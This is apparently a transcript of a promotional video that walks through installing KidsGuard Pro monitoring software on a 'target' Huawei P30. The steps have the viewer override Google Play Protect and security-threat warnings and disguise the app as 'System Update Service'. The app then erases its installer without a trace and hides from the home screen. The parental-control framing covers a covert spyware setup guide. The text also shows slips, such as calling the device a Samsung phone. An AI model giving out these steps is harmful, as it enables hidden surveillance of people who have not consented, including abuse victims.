Hi everyone, welcome to our channel. Today, we'll walk you through the process of setting up KidsGuard Pro on Huawei P30 Android 10. By the end of this video, you'll have everything you need to get started quickly and easily. Hi there. Just a quick update on the installation process. This will only take about 2 to 3 minutes, so please be patient as we set things up for you. The most important is to make sure you have the necessary rights to access the target device. Before we proceed, remember, you'll need to choose a plan to get started. Pick the one that best fits your needs. Welcome to our step-by-step setup guide for KidsGuard Pro on the Huawei P30 running Android 10. In this video, we'll walk you through the entire installation process to ensure you get the most out of this powerful parental control app. Whether you're new to KidsGuard Pro or just setting it up on your Huawei P30, we've got you covered. By the end of this guide, you'll have everything configured and ready to monitor and protect your child's mobile experience effectively. Let's get started. Step 1. How to download the app on the target Huawei phone. Open any browser. We'll use Google Chrome for this example. Enter https://www.clevguard.vip in the search bar to access the download page. Slide the bar to start downloading the Installation Assistant app. Then complete the action using the package installer. Step 2. How to install the app on the target device. Once the download is complete, tap Install and then Open to launch the installer. At this stage, you'll be prompted to bypass the Google Play Protect by clicking Install Anyway. Tap Open greater than Install greater than Allow App Installs to initiate the installation process. Go ahead by choosing Got It to start the KidsGuard Pro Assistant. When prompted by the security threat window, tap Ignore to proceed with the installation. Step 3. How to set up the Assistant app. On ClevGuard HUAWEI and Privacy Policy, tap Open and then agree to launch the app. Log in using your registered email address and password. Enter the name, gender, and age to customize the profile. Tap Next greater than Configuration, greater than Proceed to Settings. Scroll through the apps to find System Update Service and enable it. Temporarily disable Google Play Protect by turning off app scanning in the settings. Enter your lock screen password to ensure the settings. Step 4. Confirm the configuration. Return to the Assistant app and tap Already Set to confirm the configuration. Then, select Proceed to Settings greater than and navigate to Downloaded Services greater than System Update Service to grant full control of the Samsung phone. After the setup is complete, the process will continue automatically. Tap Allow Usage Access to start the automatic configuration. Then, as instructed, click Manually Configure to lock the app from Task Manager. At this stage, swipe down the app interface and you can see a lock icon beside the app name. Then follow the on-screen instructions. Click at Verify Setup to finalize the setup process, and the installation assignment will be deleted from the target device without leaving any trace. The Assistant app will go incognito, meaning it will no longer appear on the home screen or app library of the target phone. By now, you have already successfully completed the whole setup process. Let's get started. Let's quickly recap what we've done. Downloaded and installed the app, configured the settings, and verified the setup. If you need any further assistance, visit our support website or contact our customer service team for help. Okay, that's all for this video. If you find this video guide helpful, don't forget to thumbs up and subscribe. Don't miss out on the peace of mind that KidsGuard Pro offers. Click the link in the description to download the app and set it up on your Huawei P30 now. Your child's online safety is just a few steps away.